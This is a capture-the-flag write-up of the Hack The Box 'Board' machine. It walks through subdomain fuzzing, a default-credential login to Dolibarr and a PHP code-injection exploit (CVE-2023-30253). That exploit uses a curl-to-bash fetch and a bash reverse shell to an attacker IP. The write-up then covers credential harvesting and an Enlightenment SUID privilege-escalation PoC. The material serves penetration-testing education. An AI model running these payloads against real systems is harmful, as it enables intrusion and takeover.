board htb writeup

 

Hackthebox board.htb Writeup

User

• The pentester starts with a port scan and discovers that the ports 22,80 are open.

# Nmap 7.94SVN scan initiated Mon May 27 19:30:34 2024 as: nmap -sCV -p22,80 -n -Pn -v -oN scanPorts 10.129.67.131 Nmap scan report for 10.129.67.131 Host is up (2.3s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 27 19:30:55 2024 -- 1 IP address (1 host up) scanned in 21.78 seconds

• Due to there not being any interesting exploits for the version of OpenSSH 8.2, and the pentester not having credentials for the service, port 80 looks much more interesting to be analyzed for vulnerabilities.

• The pentester noticed that the website on port 80 belongs to BoardLight, which is a cybersecurity consulting firm. After inspecting the website thoroughly, he didn’t discover any vulnerable functionality. However, he noticing a possible domain name for the website: board.htb

  


• As a result, the pentester attempted to search for some subdomain. To do this, he first added the domain to the file /etc/hosts using the following command.

sudo tee -a /etc/hosts <<< "10.129.67.131 board.htb"

• Then the pentester conducted subdomain fuzzing with the tool ffuf using the following command, aiming to encounter a subdomain.

• ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -ic -t 200 -c -fs 15949

Comments: Something worth mentioning is that the tool ‘ffuf’, (similar to the ‘Burp Suite’ proxy), performs a character count, which is represented in the ‘size’ field of the output. This can be observed in line 200 of the Go code in the file ('simple.go') available at: simple.go

In order to discover the new subdomain, it’s necessary to filter the size field. This is required because for non-existent subdomains, the response code will remain 200 OK, and it will display the default response content of the board.htb domain. To calculate the fs corresponding to board.htb, you just need to use the following command.

curl -s http://board.htb | wc -c # 15949

It’s worth noting that the same information could have been obtained by passing the request through the 'Burp Suite' proxy, where it would be available in the response header 'Content-Length', or by inspecting the Network tab in your preferred browser, as illustrated in the following image. 

 

• Great! The pentester discovered the subdomain crm.board.htb as a result, he added this subdomain in the /etc/hosts file and proceeded to conduct further analysis of this new subdomain.

/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://board.htb :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt :: Header : Host: FUZZ.board.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 200 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 15949 ________________________________________________ crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 176ms]

• Upon accessing the subdomain crm.board.htb, the pentester noticed that it is running the service Dolibarr (17.0.0). A quick search for vulnerabilities associated with this service allowed the pentester to discover the following CVE: PHP Code Injection (CVE-2023-30253). This vulnerability fundamentally consists of being able to bypass security controls that prohibit an unprivileged user from adding or editing PHP dynamic content (generally, these actions are restricted to developers). However, this vulnerability not only allows this but also circumvents the blacklist of certain dangerous PHP functions (commands) such as system, exec, etc., ultimately allowing Remote Code Execution (RCE).

• To exploit this vulnerability, authentication in Dolibarr is required. A quick search for default credentials of this software yields the following: admin:admin.

• He tried to access with those credentials. Boom! He could authenticate in Dolibarr. However, to exploit this vulnerability, it is necessary to have access to a page belonging to a website in order to modify the source code. Unfortunately, there isn’t one available. Therefore, I created a website with the following steps.
• 
  

• He modified the source code with the following content in order to see if it’s possible to exploit the vulnerability

<?PhP echo "Testing" . ": CVE-2023-30253";?>

• So in order to receive a reverse shell, he hosted the following pwn.html file on an HTTP server, with the following content:

bash -i>&/dev/tcp/10.10.14.80/4444 0>&1

• And then, he executed the following PHP code.

<?PHP system("curl -s http://10.10.14.80/pwn.html|bash");?>

• Nice!! He retrieved a reverse shell and then he established that.

• Since he had access to the server as the user www-data, he attempted to search for connection strings or hardcoded credentials in some files. For this purpose, he executed the following commands.

grep -arin 'DB_USER\|DB_PASSWORD' |awk -F':' '{print $1}' | sort | uniq -c

• After reviewing those files, the pentester found a password (serverfun2$2023!!) for the mysql service.

• The user enumeration reveals the existence of the user larissa.

grep -P ".*sh$" /etc/passwd

• Assuming there is credential reuse, the pentester attempted to switch to the user larissa, which was discovered earlier. Success! Now they have switched to the user larissa and read the file /home/larissa/user.txt.

Root

• Once access as the user larissa is obtained, the pentester continues the enumeration to escalate privileges to root, now with the new privileges and permissions acquired for this user. They search for SUID binaries and identify non-common binaries with SUID permission, especially those related to enlightenment.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Tip: It is necessary to emphasize these binaries further, as curiously, the SUID permissions are applied to binaries related to EnLIGHTenment (which is one of the main window managers of Linux), which has a certain relationship with the machine name (BoardLIGHT).

• A quick search for vulnerabilities related to the Enlightenment (desktop environment) software led us to discover the CVE-2022-37706 discovered by MaherAzzouzi, which allows privilege escalation to root user. Essentially, this CVE-2022-37706 consists of a command injection exploiting the logical bug caused by repeated calls to the eina_strbuf_append_printf() function. An excellent explanation can be found on the GitHub page of MaherAzzouzi. Therefore, the pentester used that Proof of Concept (PoC) for privilege escalation.

mkdir /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit" echo "/bin/bash" > /tmp/exploit chmod a+x /tmp/exploit /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

• Finally, he executed this Proof of Concept (PoC) and succeeded! The pentester was able to read the file /root/root.txt.

I hope you had as much fun reading this write up as I did hacking it. Happy Hacking!!👾